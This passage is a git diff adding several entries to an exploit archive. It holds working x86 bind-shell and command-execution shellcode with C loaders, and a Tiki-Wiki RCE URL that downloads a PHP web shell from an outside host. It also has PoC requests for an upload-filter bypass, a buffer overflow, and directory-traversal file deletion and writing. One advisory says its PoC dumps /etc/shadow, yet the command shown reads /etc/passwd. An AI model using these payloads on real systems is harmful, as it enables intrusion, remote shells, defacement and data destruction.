socketcall type to sys_socket + push 0x1 ; we now pass 1 onto the stack for SOCK_STREAM + push 0x2 ; we now pass 2 onto the stack for AF_INET + mov ecx, esp; this moves the memory location of our args to ecx + int 0x80 ; execute the syscall socketcall + mov edx, eax ; This allows us to save the FD from the socket + + ; This avoids SIGSEGV when trying to reconnect + ; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &socklen_t, socklen_t) + + xor eax, eax; 0's our eax + mov ax, 102; moves syscall for socketcall into ax + xor ebx, ebx; 0's out ebx + mov bl, 0x14; moves the sys_setsocketopt as param 1 + + push 0x4; push the sizeof onto the stack + push esp; now we push the memory location of param 1(sizeof) onto the stack + push 0x2; we now set the SO_REUSEADDR onto the stack + push 0x1; we now set the SOL_SOCKET onto the stack + push edx; this pushes our previous socket FD onto the stack + mov ecx, esp; this pushes the memory location of our args into ecx + int 0x80; execute the syscall socketcall + + + ; We now setup the bind + ; bind(sockfd, [AF_INET, 11111, INADDR_ANY], 16) + xor eax, eax; 0's out eax + mov ax, 102; moves syscall for socketcall into ax + xor ebx, ebx; 0's out ebx + push ebx; this pushes 0 onto the stack for our first arg of INADDR_ANY for our local host + mov bl, 0x2; set the socketcall type to sys_bind + push WORD 0x5c11; we now set the port to bind on, in reverse order is 4444 + push WORD 0x2; we now push the arg AF_INET onto the stack + mov ecx, esp; we now grab our memeory location to our args + push 0x16; we now set the sockaddr size onto the stack + push ecx; we now push our memory location of our previous args onto the stack + push edx; we push our current socket FD onto the stack + mov ecx, esp; we now get our new socket FD + int 0x80; execute the syscall socketcall + + + ; We now need to setup a passive socket to wait for the new connection + ; listen(sockfd, 0); + xor eax, eax; 0's our eax + xor ebx, ebx; 0's out ebx + push ebx; this pushes our 2nd arg for connection que size to 0 + mov ax, 102; moves syscall for socketcall into ax + mov bl, 0x4; we now set the socketcall type to sys_listen + push edx; we now push our socket FD onto the stack + mov ecx, esp; we now move the memory location of our args list into ecx + int 0x80; execute the syscall for socketcall with the listen type + + ; We now accept the connection when it comes in + ; accept(sockfd, NULL, NULL) + + xor eax, eax; 0's our eax + xor ebx, ebx; 0's out ebx + push ebx; we add these 2 0's since we dont need information on the client connecting to us + push ebx + mov ax, 102; moves syscall for socketcall int ax + mov bl, 0x5; we set the socketcall type to sys_accept + push edx; we push our Socket FD onto the stack + mov ecx, esp; we grab the memeory location of our args and move it to ecx + int 0x80; execute the syscall socketcall + mov edx, eax; this saves the Socket FD for the client + + + ; We can now use dup2 to create all 3 of our std's, in/out/err so that our shellhas access to it over the socket + ; dup2(clientfd) + xor eax, eax; 0's out eax + xor ecx, ecx; 0's out ecx since our first std FD is in so its 0 + mov al, 63; we now move the syscall for dup2 into al + mov ebx, edx; we now move the client socket FD into ebx + int 0x80; execute the dup2 syscall + + xor eax, eax; 0's out the eax reg due to any return's happening + xor ecx, ecx; 0's out ecx + mov al, 63; this is the syscall for dup2 + mov cl, 0x1; we now set cl to the FD of stdout + int 0x80; execut the dup2 syscall + + xor eax, eax; 0's out eax + mov al, 63; moves the dup2 syscall + mov cl, 0x2; we now set cl to the stderr FD + int 0x80; execute the dup2 syscall + + + ; We can now execute our shell in /bin/bash + + xor eax, eax ; we first need our nulls + push eax ; this will push a drowd of nulls onto the stack + + + ; this section of pushes are the string ////bin/bash from our pyhton 1 liner above + push 0x68736162 + push 0x2f6e6962 + push 0x2f2f2f2f + + mov ebx, esp ; this moves the memory address of esp(pointing to our string & nulls) + ; from the stack into ebx where execve is expecting the name of the application + a null + push eax ; this pushes another null onto the stack + mov edx, esp ; this now gets the memory address of the nulls we just pushed onto the stack into edx, this is for envp so it can just be null + push ebx ; this pushes the memory address of our string onto the stack + mov ecx, esp ; this moves the address of our string from the stack to ecx + mov al, 0xb ; this will load the syscall # 11 + int 0x80 ; execute the system call +*/ + +// Python code to get the instruction in HEX of the string reversed to place into the stack +// python -c 'string="//etc/shadow";splitNum=8;print "\nLength: %s" % len(string[::-1]);string=string[::-1].encode("hex"); \ +// string=["push 0x"+str(string[i:i+splitNum]) for i in range(0, len(string), splitNum)]; \ +// print "Hex List:\n"; print("\n".join(h for h in string))' + + +// Port: 4444 (\x5c\x11) in shellcode +// ShellCode--- +// Bytes: 656 +// Tested on: Linux 3.13.0-32, Ubuntu 12.04.5 LTS, X86 + +//------------- OBJDUMP ------------- +//execve-stack-bind: file format elf32-i386 + +//Disassembly of section .text: +//8048060 <_start>: + //8048060: 31 c0 xor eax,eax + //8048062: 50 push eax + //8048063: 66 b8 66 00 mov ax,0x66 + //8048067: 31 db xor ebx,ebx + //8048069: b3 01 mov bl,0x1 + //804806b: 6a 01 push 0x1 + //804806d: 6a 02 push 0x2 + //804806f: 89 e1 mov ecx,esp + //8048071: cd 80 int 0x80 + //8048073: 89 c2 mov edx,eax + //8048075: 31 c0 xor eax,eax + //8048077: 66 b8 66 00 mov ax,0x66 + //804807b: 31 db xor ebx,ebx + //804807d: b3 14 mov bl,0x14 + //804807f: 6a 04 push 0x4 + //8048081: 54 push esp + //8048082: 6a 02 push 0x2 + //8048084: 6a 01 push 0x1 + //8048086: 52 push edx + //8048087: 89 e1 mov ecx,esp + //8048089: cd 80 int 0x80 + //804808b: 31 c0 xor eax,eax + //804808d: 66 b8 66 00 mov ax,0x66 + //8048091: 31 db xor ebx,ebx + //8048093: 53 push ebx + //8048094: b3 02 mov bl,0x2 + //8048096: 66 68 11 5c pushw 0x5c11 + //804809a: 66 6a 02 pushw 0x2 + //804809d: 89 e1 mov ecx,esp + //804809f: 6a 16 push 0x16 + //80480a1: 51 push ecx + //80480a2: 52 push edx + //80480a3: 89 e1 mov ecx,esp + //80480a5: cd 80 int 0x80 + //80480a7: 31 c0 xor eax,eax + //80480a9: 31 db xor ebx,ebx + //80480ab: 53 push ebx + //80480ac: 66 b8 66 00 mov ax,0x66 + //80480b0: b3 04 mov bl,0x4 + //80480b2: 52 push edx + //80480b3: 89 e1 mov ecx,esp + //80480b5: cd 80 int 0x80 + //80480b7: 31 c0 xor eax,eax + //80480b9: 31 db xor ebx,ebx + //80480bb: 53 push ebx + //80480bc: 53 push ebx + //80480bd: 66 b8 66 00 mov ax,0x66 + //80480c1: b3 05 mov bl,0x5 + //80480c3: 52 push edx + //80480c4: 89 e1 mov ecx,esp + //80480c6: cd 80 int 0x80 + //80480c8: 89 c2 mov edx,eax + //80480ca: 31 c0 xor eax,eax + //80480cc: 31 c9 xor ecx,ecx + //80480ce: b0 3f mov al,0x3f + //80480d0: 89 d3 mov ebx,edx + //80480d2: cd 80 int 0x80 + //80480d4: 31 c0 xor eax,eax + //80480d6: 31 c9 xor ecx,ecx + //80480d8: b0 3f mov al,0x3f + //80480da: b1 01 mov cl,0x1 + //80480dc: cd 80 int 0x80 + //80480de: 31 c0 xor eax,eax + //80480e0: b0 3f mov al,0x3f + //80480e2: b1 02 mov cl,0x2 + //80480e4: cd 80 int 0x80 + //80480e6: 31 c0 xor eax,eax + //80480e8: 50 push eax + //80480e9: 68 62 61 73 68 push 0x68736162 + //80480ee: 68 62 69 6e 2f push 0x2f6e6962 + //80480f3: 68 2f 2f 2f 2f push 0x2f2f2f2f + //80480f8: 89 e3 mov ebx,esp + //80480fa: 50 push eax + //80480fb: 89 e2 mov edx,esp + //80480fd: 53 push ebx + //80480fe: 89 e1 mov ecx,esp + //8048100: b0 0b mov al,0xb + //8048102: cd 80 int 0x80 +//------------- OBJDUMP ------------- + +#include +#include + +unsigned char code[] = \ +"\x31\xc0\x50\x66\xb8\x66\x00\x31\xdb\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80" +"\x89\xc2\x31\xc0\x66\xb8\x66\x00\x31\xdb\xb3\x14\x6a\x04\x54\x6a\x02\x6a\x01" +"\x52\x89\xe1\xcd\x80\x31\xc0\x66\xb8\x66\x00\x31\xdb\x53\xb3\x02\x66\x68" +"\x11\x5c" //<----PORT #4444 +"\x66\x6a\x02\x89\xe1\x6a\x16\x51\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53" +"\x66\xb8\x66\x00\xb3\x04\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53\x53\x66\xb8" +"\x66\x00\xb3\x05\x52\x89\xe1\xcd\x80\x89\xc2\x31\xc0\x31\xc9\xb0\x3f\x89\xd3" +"\xcd\x80\x31\xc0\x31\xc9\xb0\x3f\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\xb1\x02\xcd" +"\x80\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f" +"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"; + + +main() +{ +printf("Shellcode Length: %d\n", strlen(code)); +int (*ret)() = (int(*)())code; +ret(); +} diff --git a/platforms/linux/local/39967.txt b/platforms/linux/local/39967.txt new file mode 100755 index 000000000..9c008fe6d --- /dev/null +++ b/platforms/linux/local/39967.txt @@ -0,0 +1,51 @@ +Product: Solarwinds Virtualization Manager + +Vendor: Solarwinds +Vulnerable Version(s): < 6.3.1 +Tested Version: 6.3.1 + +Vendor Notification: April 25th, 2016 +Vendor Patch Availability to Customers: June 1st, 2016 +Public Disclosure: June 14th, 2016 + +Vulnerability Type: Security Misconfiguration +CVE Reference: CVE-2016-3643 +Risk Level: High +CVSSv2 Base Score: 7.8 (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:W/RC:C/CR:M/IR:M/AR:M/MAV:L/MAC:L/MPR:L/MUI:N/MS:C/MC:H/MI:H/MA:H) +Solution Status: Solution Available + +Discovered and Provided: Nate Kettlewell, Depth Security ( https://www.depthsecurity.com/ ) + +----------------------------------------------------------------------------------------------- + +Advisory Details: + +Depth Security discovered a vulnerability in Solarwinds Virtualization Manager appliance. +This attack requires a user to have an operating system shell on the vulnerable appliance. + +1) Misconfiguration of sudo in Solarwinds Virtualization Manager: CVE-2016-3643 + +The vulnerability exists due to the miconfiguration of sudo in that it allows any local user to use sudo to execute commands as the superuser. +A local attacker can obtain root privileges to the operating system regardless of privilege level. + +----------------------------------------------------------------------------------------------- + +Solution: + +Solarwinds has released a hotfix to remediate this vulnerability on existing installations. + +This flaw as well as several others have been corrected and that release has been put into manufacturing for new appliances. + +----------------------------------------------------------------------------------------------- + +Proof of Concept: + +The following is an example of the commands necessary for a low-privileged user to dump the contents of the "/etc/shadow" file by using sudo. + +sudo cat /etc/passwd + +----------------------------------------------------------------------------------------------- + +References: + +[1] Solarwinds Virtualization Manager- http://www.solarwinds.com/virtualization-manager - Solarwinds Virtualization Manager provides monitoring and remediation for virtualized environments. \ No newline at end of file diff --git a/platforms/multiple/shellcode/39885.c b/platforms/multiple/shellcode/39885.c new file mode 100755 index 000000000..425da60cf --- /dev/null +++ b/platforms/multiple/shellcode/39885.c @@ -0,0 +1,401 @@ +/** + # Title : Execute command on Linux/Windows/BSD x86_64 execve("/bin//sh", {"//bin/sh", "-c", "cmd"}, NULL) shellcode + # Date : 04-06-2016 + # Author : @odzhancode + # Tested On : Debian x86/x64, FreeBSD x64, OpenBSD x64, Windows x86, Windows x64 +*/ + +; ************************************** +; exec.asm +; +; Execute a command +; Works on 32/64-bit versions of Windows and Linux, 64-bit versions of FreeBSD/OpenBSD +; +; yasm -fbin exec.asm -oexec.bin +; nasm -fbin exec.asm -oexec.bin +; +; 194 bytes +; + bits 32 + + push esi + push edi + push ebx + push ebp + + xor ecx, ecx ; ecx=0 + mul ecx ; eax=0, edx=0 + + push eax + push eax + push eax + push eax + push eax ; setup homespace for win64 + jmp l_sb ; load command + +get_os: + pop edi ; edi=cmd, argv + mov cl, 7 + ; initialize cmd/argv regardless of OS + push eax ; argv[3]=NULL; + push edi ; argv[2]=cmd + repnz scasb ; skip command line + stosb ; zero terminate + push edi ; argv[1]="-c", 0 + scasw ; skip option + stosb ; zero terminate + push edi ; argv[0]="/bin//sh", 0 + push esp ; save argv + push edi ; save pointer to "/bin//sh", 0 + + mov al, 6 ; eax=sys_close for Linux/BSD + inc ecx ; ignored on x64 + jecxz gos_x64 ; if ecx==0 we're 64-bit + + ; we're 32-bit + ; if gs is zero, we're native 32-bit windows + mov cx, gs + jecxz win_cmd + + ; if eax is zero after right shift of SP, ASSUME we're on windows + push esp + pop eax + shr eax, 24 + jz win_cmd + + ; we're 32-bit Linux + mov al, 11 ; eax=sys_execve + pop ebx ; ebx="/bin//sh", 0 + pop ecx ; ecx=argv + int 0x80 + + ; we're 64-bit, execute syscall and see what + ; error returned +gos_x64: + push -1 + pop edi + syscall + cmp al, 5 ; Access Violation indicates windows + push 59 + pop eax + cdq + jz win_cmd + + pop edi ; rdi="/bin//sh", 0 + pop esi ; rsi=argv + syscall +l_sb: + jmp ld_cmd + ; following code is derived from Peter Ferrie's calc shellcode + ; i've modified it to execute commands +win_cmd: + pop eax ; eax="/bin//sh", 0 + pop eax ; eax=argv + pop eax ; eax="/bin//sh", 0 + pop eax ; eax="-c", 0 + pop ecx ; ecx=cmd + pop eax ; eax=0 + + inc eax + xchg edx, eax + jz x64 + + push eax ; will hide + push ecx ; cmd + + mov esi, [fs:edx+2fh] + mov esi, [esi+0ch] + mov esi, [esi+0ch] + lodsd + mov esi, [eax] + mov edi, [esi+18h] + mov dl, 50h + jmp lqe + bits 64 +x64: + mov dl, 60h + mov rsi, [gs:rdx] + mov rsi, [rsi+18h] + mov rsi, [rsi+10h] + lodsq + mov rsi, [rax] + mov rdi, [rsi+30h] +lqe: + add edx, [rdi+3ch] + mov ebx, [rdi+rdx+28h] + mov esi, [rdi+rbx+20h] + add rsi, rdi + mov edx, [rdi+rbx+24h] +fwe: + movzx ebp, word [rdi+rdx] + lea rdx, [rdx+2] + lodsd + cmp dword [rdi+rax], 'WinE' + jne fwe + + mov esi, [rdi+rbx+1ch] + add rsi, rdi + + mov esi, [rsi+rbp*4] + add rdi, rsi + cdq + call rdi +cmd_end: + bits 32 + pop eax + pop eax + pop eax + pop eax + pop eax + pop ebp + pop ebx + pop edi + pop esi + ret +ld_cmd: + call get_os + ; place command here + ;db "notepad", 0xFF + ; do not change anything below + ;db "-c", 0xFF, "/bin//sh", 0 + +// *************** xcmd.c + +/** + Copyright © 2016 Odzhan. All Rights Reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + 1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + 3. The name of the author may not be used to endorse or promote products + derived from this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR + IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED + WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, + INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES + (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, + STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN + ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + POSSIBILITY OF SUCH DAMAGE. */ + +#include +#include +#include +#include + +#if defined (_WIN32) || defined(_WIN64) +#define WIN +#include +#else +#include +#endif + +#define CMD_LEN_OFS 0x10+1 +#define EXEC_SIZE 194 + +char exec[]= { + /* 0000 */ "\x56" /* push esi */ + /* 0001 */ "\x57" /* push edi */ + /* 0002 */ "\x53" /* push ebx */ + /* 0003 */ "\x55" /* push ebp */ + /* 0004 */ "\x31\xc9" /* xor ecx, ecx */ + /* 0006 */ "\xf7\xe1" /* mul ecx */ + /* 0008 */ "\x50" /* push eax */ + /* 0009 */ "\x50" /* push eax */ + /* 000A */ "\x50" /* push eax */ + /* 000B */ "\x50" /* push eax */ + /* 000C */ "\x50" /* push eax */ + /* 000D */ "\xeb\x37" /* jmp 0x46 */ + /* 000F */ "\x5f" /* pop edi */ + /* 0010 */ "\xb1\x00" /* mov cl, 0x0 */ + /* 0012 */ "\x50" /* push eax */ + /* 0013 */ "\x57" /* push edi */ + /* 0014 */ "\xf2\xae" /* repne scasb */ + /* 0016 */ "\xaa" /* stosb */ + /* 0017 */ "\x57" /* push edi */ + /* 0018 */ "\x66\xaf" /* scasw */ + /* 001A */ "\xaa" /* stosb */ + /* 001B */ "\x57" /* push edi */ + /* 001C */ "\x54" /* push esp */ + /* 001D */ "\x57" /* push edi */ + /* 001E */ "\xb0\x06" /* mov al, 0x6 */ + /* 0020 */ "\x41" /* inc ecx */ + /* 0021 */ "\xe3\x12" /* jecxz 0x35 */ + /* 0023 */ "\x66\x8c\xe9" /* mov cx, gs */ + /* 0026 */ "\xe3\x20" /* jecxz 0x48 */ + /* 0028 */ "\x54" /* push esp */ + /* 0029 */ "\x58" /* pop eax */ + /* 002A */ "\xc1\xe8\x18" /* shr eax, 0x18 */ + /* 002D */ "\x74\x19" /* jz 0x48 */ + /* 002F */ "\xb0\x0b" /* mov al, 0xb */ + /* 0031 */ "\x5b" /* pop ebx */ + /* 0032 */ "\x59" /* pop ecx */ + /* 0033 */ "\xcd\x80" /* int 0x80 */ + /* 0035 */ "\x6a\xff" /* push 0xffffffff */ + /* 0037 */ "\x5f" /* pop edi */ + /* 0038 */ "\x0f\x05" /* syscall */ + /* 003A */ "\x3c\x05" /* cmp al, 0x5 */ + /* 003C */ "\x6a\x3b" /* push 0x3b */ + /* 003E */ "\x58" /* pop eax */ + /* 003F */ "\x99" /* cdq */ + /* 0040 */ "\x74\x06" /* jz 0x48 */ + /* 0042 */ "\x5f" /* pop edi */ + /* 0043 */ "\x5e" /* pop esi */ + /* 0044 */ "\x0f\x05" /* syscall */ + /* 0046 */ "\xeb\x75" /* jmp 0xbd */ + /* 0048 */ "\x58" /* pop eax */ + /* 0049 */ "\x58" /* pop eax */ + /* 004A */ "\x58" /* pop eax */ + /* 004B */ "\x58" /* pop eax */ + /* 004C */ "\x59" /* pop ecx */ + /* 004D */ "\x58" /* pop eax */ + /* 004E */ "\x40" /* inc eax */ + /* 004F */ "\x92" /* xchg edx, eax */ + /* 0050 */ "\x74\x16" /* jz 0x68 */ + /* 0052 */ "\x50" /* push eax */ + /* 0053 */ "\x51" /* push ecx */ + /* 0054 */ "\x64\x8b\x72\x2f" /* mov esi, [fs:edx+0x2f] */ + /* 0058 */ "\x8b\x76\x0c" /* mov esi, [esi+0xc] */ + /* 005B */ "\x8b\x76\x0c" /* mov esi, [esi+0xc] */ + /* 005E */ "\xad" /* lodsd */ + /* 005F */ "\x8b\x30" /* mov esi, [eax] */ + /* 0061 */ "\x8b\x7e\x18" /* mov edi, [esi+0x18] */ + /* 0064 */ "\xb2\x50" /* mov dl, 0x50 */ + /* 0066 */ "\xeb\x17" /* jmp 0x7f */ + /* 0068 */ "\xb2\x60" /* mov dl, 0x60 */ + /* 006A */ "\x65\x48" /* dec eax */ + /* 006C */ "\x8b\x32" /* mov esi, [edx] */ + /* 006E */ "\x48" /* dec eax */ + /* 006F */ "\x8b\x76\x18" /* mov esi, [esi+0x18] */ + /* 0072 */ "\x48" /* dec eax */ + /* 0073 */ "\x8b\x76\x10" /* mov esi, [esi+0x10] */ + /* 0076 */ "\x48" /* dec eax */ + /* 0077 */ "\xad" /* lodsd */ + /* 0078 */ "\x48" /* dec eax */ + /* 0079 */ "\x8b\x30" /* mov esi, [eax] */ + /* 007B */ "\x48" /* dec eax */ + /* 007C */ "\x8b\x7e\x30" /* mov edi, [esi+0x30] */ + /* 007F */ "\x03\x57\x3c" /* add edx, [edi+0x3c] */ + /* 0082 */ "\x8b\x5c\x17\x28" /* mov ebx, [edi+edx+0x28] */ + /* 0086 */ "\x8b\x74\x1f\x20" /* mov esi, [edi+ebx+0x20] */ + /* 008A */ "\x48" /* dec eax */ + /* 008B */ "\x01\xfe" /* add esi, edi */ + /* 008D */ "\x8b\x54\x1f\x24" /* mov edx, [edi+ebx+0x24] */ + /* 0091 */ "\x0f\xb7\x2c\x17" /* movzx ebp, word [edi+edx] */ + /* 0095 */ "\x48" /* dec eax */ + /* 0096 */ "\x8d\x52\x02" /* lea edx, [edx+0x2] */ + /* 0099 */ "\xad" /* lodsd */ + /* 009A */ "\x81\x3c\x07\x57\x69\x6e\x45" /* cmp dword [edi+eax], 0x456e6957 */ + /* 00A1 */ "\x75\xee" /* jnz 0x91 */ + /* 00A3 */ "\x8b\x74\x1f\x1c" /* mov esi, [edi+ebx+0x1c] */ + /* 00A7 */ "\x48" /* dec eax */ + /* 00A8 */ "\x01\xfe" /* add esi, edi */ + /* 00AA */ "\x8b\x34\xae" /* mov esi, [esi+ebp*4] */ + /* 00AD */ "\x48" /* dec eax */ + /* 00AE */ "\x01\xf7" /* add edi, esi */ + /* 00B0 */ "\x99" /* cdq */ + /* 00B1 */ "\xff\xd7" /* call edi */ + /* 00B3 */ "\x58" /* pop eax */ + /* 00B4 */ "\x58" /* pop eax */ + /* 00B5 */ "\x58" /* pop eax */ + /* 00B6 */ "\x58" /* pop eax */ + /* 00B7 */ "\x58" /* pop eax */ + /* 00B8 */ "\x5d" /* pop ebp */ + /* 00B9 */ "\x5b" /* pop ebx */ + /* 00BA */ "\x5f" /* pop edi */ + /* 00BB */ "\x5e" /* pop esi */ + /* 00BC */ "\xc3" /* ret */ + /* 00BD */ "\xe8\x4d\xff\xff\xff" /* call 0xf */ +}; + +// save code to binary file +void bin2file (uint8_t bin[], size_t len) +{ + FILE *out=fopen ("sh_cmd.bin", "wb"); + if (out!=NULL) + { + fwrite (bin, 1, len, out); + fclose (out); + } +} +// allocate read/write and executable memory +// copy data from code and execute +void xcode(void *code, size_t code_len, char *cmd, size_t cmd_len) +{ + void *bin; + uint8_t *p; + char args[]="\xFF-c\xFF/bin//sh\x00"; + size_t arg_len; + + arg_len=strlen(args) + 1; + + printf ("[ executing code...\n"); + +#ifdef WIN + bin=VirtualAlloc (0, code_len + cmd_len + arg_len, + MEM_COMMIT, PAGE_EXECUTE_READWRITE); +#else + bin=mmap (0, code_len + cmd_len + arg_len, + PROT_EXEC | PROT_WRITE | PROT_READ, + MAP_ANON | MAP_PRIVATE, -1, 0); +#endif + if (bin!=NULL) + { + p=(uint8_t*)bin; + + memcpy (p, code, code_len); + // set the cmd length + p[CMD_LEN_OFS] = (uint8_t)cmd_len; + // copy cmd + memcpy ((void*)&p[code_len], cmd, cmd_len); + // copy argv + memcpy ((void*)&p[code_len+cmd_len], args, arg_len); + + //DebugBreak(); + bin2file(bin, code_len+cmd_len+arg_len); + + // execute + ((void(*)())bin)(); + +#ifdef WIN + VirtualFree (bin, code_len+cmd_len+arg_len, MEM_RELEASE); +#else + munmap (bin, code_len+cmd_len+arg_len); +#endif + } +} + +int main(int argc, char *argv[]) +{ + size_t len; + char *cmd; + + if (argc != 2) { + printf ("\n usage: xcmd \n"); + return 0; + } + + cmd=argv[1]; + len=strlen(cmd); + + if (len==0 || len>255) { + printf ("\n invalid command length: %i (must be between 1 and 255)", len); + return 0; + } + + xcode(exec, EXEC_SIZE, cmd, len); + + return 0; +} diff --git a/platforms/php/webapps/39963.txt b/platforms/php/webapps/39963.txt new file mode 100755 index 000000000..05ee4f0a1 --- /dev/null +++ b/platforms/php/webapps/39963.txt @@ -0,0 +1,27 @@ +# Exploit Title: Roxy Fileman <= 1.4.4 Forbidden File Upload Vulnerability +# Google Dork: intitle:"Roxy file manager" +# Date: 15-06-2016 +# Exploit Author: Tyrell Sassen +# Vendor Homepage: http://www.roxyfileman.com/ +# Software Link: http://www.roxyfileman.com/download.php?f=1.4.4-php +# Version: 1.4.4 +# Tested on: PHP + +1. Description + +The Roxy File Manager has a configuration setting named FORBIDDEN_UPLOADS, +which keeps a list of forbidden file extensions that the application will +not allow to be uploaded. This configuration setting is also checked when +renaming an existing file to a new file extension. + +It is possible to bypass this check and rename already uploaded files to +any extension, using the move function as this function does not perform +any checks. + + +2. Proof of Concept + +http://host/fileman/php/movefile.php?f=/Upload/backdoor.jpg&n=/Upload/backdoor.php + + +The renamed file will now be accessible at http://host/Upload/backdoor.php diff --git a/platforms/php/webapps/39964.html b/platforms/php/webapps/39964.html new file mode 100755 index 000000000..243f1cdee --- /dev/null +++ b/platforms/php/webapps/39964.html @@ -0,0 +1,47 @@ + + + + +
+ + + + + + + +
+ + + + + + diff --git a/platforms/php/webapps/39965.txt b/platforms/php/webapps/39965.txt new file mode 100755 index 000000000..ddc34f156 --- /dev/null +++ b/platforms/php/webapps/39965.txt @@ -0,0 +1,26 @@ +# Exploit Title: Tiki-Calendar-RCE +# Google Dork: inurl:tiki-calendar.php +# Date: 2015-12-16 +# Exploit Author: Dany Ouellet +# Vendor Homepage: https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki +# Software Link: https://tiki.org/Download +# Version: ALL supported versions of Tiki (14.2, 12.5 LTS, 9.11 LTS and 6.15)(if not patched) +# Tested on: Windows and Linux + +Hi, I recently discover an important flaw in CMS Tiki-Wiki. I reported the +vulnerability directly to vendor and a patch is now avalaible. So I release +the exploit. ;) + +PoC: + +Validate the vulnerability: + +http://victimesite/tiki-calendar.php?viewmode=';print(TikiWikiRCE);$a=' + +Write or deface the site: + +http://victimesite/tiki-calendar.php?viewmode=%27;%20$z=fopen(%22index6.php%22,%27w%27);%20fwrite($z,(%22TikiWikiRCE%22));fclose($z);$a=%27 + +Execute a php shellcode: + +http://victimesite/tiki-calendar.php?viewmode=%27;%20$z=fopen%28%22shell.php%22,%27w%27%29;fwrite%28$z,file_get_contents%28%22http://hackersite.com/r57.txt%22%29%29;fclose%28$z%29;%27 diff --git a/platforms/windows/dos/39966.txt b/platforms/windows/dos/39966.txt new file mode 100755 index 000000000..5091517d5 --- /dev/null +++ b/platforms/windows/dos/39966.txt @@ -0,0 +1,48 @@ +1. Vulnerable Product Version: + +*Blat v3.2.14* +Link: blat.net + + +2. Vulnerability Information + +Impact: Attacker may gain administrative access / can perform a DOS + +Remotely Exploitable: No + +Locally Exploitable: May be possible + + +3. Product Details + +An open source Windows (32 & 64 bit) command line SMTP mailer. We can use +it to automatically email logs, the contents of a html FORM, or whatever +else you need to send. + +Since blat is lightweight, user friendly and simple (but awesome) many +vendors incorporates it with their Softwares. I have seen blat in many +commercial Softwares which use it for sending mails to its customers. And +Blat is awesome. + + +4. Vulnerability Description + +The Overflow vulnerability lies in the profile option parameter “–p”. When +a string of 236 bytes is send to blat, the EBP and EIP register gets +overwritten by the user input. + +Reproduction: + +* blat.exe crashes with this command blat.exe –install +smtp.my.tld 127.0.0.1 –p <”A”*234+”B”*2>* + + +Feeding this command overwrites EBP with 0x00410041 and EIP with 0x00420042 +(Please refer to the attached screen shot) + + +5. Links + +https://sourceforge.net/projects/blat/ + +https://groups.yahoo.com/neo/groups/blat/conversations/messages/13759 diff --git a/platforms/windows/webapps/39968.txt b/platforms/windows/webapps/39968.txt new file mode 100755 index 000000000..453134337 --- /dev/null +++ b/platforms/windows/webapps/39968.txt @@ -0,0 +1,99 @@ + +Gemalto Sentinel License Manager 18.0.1 Directory Traversal Vulnerability + + +Vendor: Gemalto NV | SafeNet, Inc +Product web page: http://www.gemalto.com | http://www.safenet-inc.com +Affected version: 18.0.1.55505 + +Summary: The Sentinel License Manager enforces and manages licensing +in multi-user environment. It keeps track of all the licenses and +handles requests from network users who want to run your application, +granting authorization to the requesters to allow them to run the +application, and denying requests when all licenses are in use. It is +an integral component of the network licensing schemes that can be +implemented with Sentinel RMS, namely server-locked licenses, site +licenses and commuter licenses. + +Desc: Input passed via the 'alpremove' and 'check_in_file' parameters +is not properly verified in '/_int_/action.html' and '/_int_/checkin_file.html' +before being used to delete and create files. This can be exploited to +arbitrarily delete sensitive information on a system and/or write files +via directory traversal attacks. + +Tested on: Microsoft Windows 7 Ultimate SP1 (EN) + HASP LM/18.00 (web server) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5330 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5330.php + + +26.04.2016 + +-- + + + +1. Unauthenticated file removal using POST or GET: +-------------------------------------------------- +1st request renames the file to meaning_of_life.txt.bak +2nd request removes the file entirely from C:\ +-------------------------------------------------------- + +POST /_int_/action.html HTTP/1.1 +Host: localhost:1947 + +alpremove=/../../../../../../../meaning_of_life.txt + +OR + +1st req: GET http://localhost:1947/_int_/action.html?alpremove=/../../../../../../../meaning_of_life.txt HTTP/1.1 +2nd req: GET http://localhost:1947/_int_/action.html?alpremove=/../../../../../../../meaning_of_life.txt HTTP/1.1 + + + +2. Unauthenticated file write: +------------------------------ +PoC that creates license file in C:\ +------------------------------------- + +POST /_int_/checkin_file.html HTTP/1.1 +Host: localhost:1947 +Content-Length: 770 +Cache-Control: max-age=0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Origin: http://localhost:1947 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVlbofFpDmUw9CugB +Referer: http://localhost:1947/_int_/checkin.html +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Cookie: 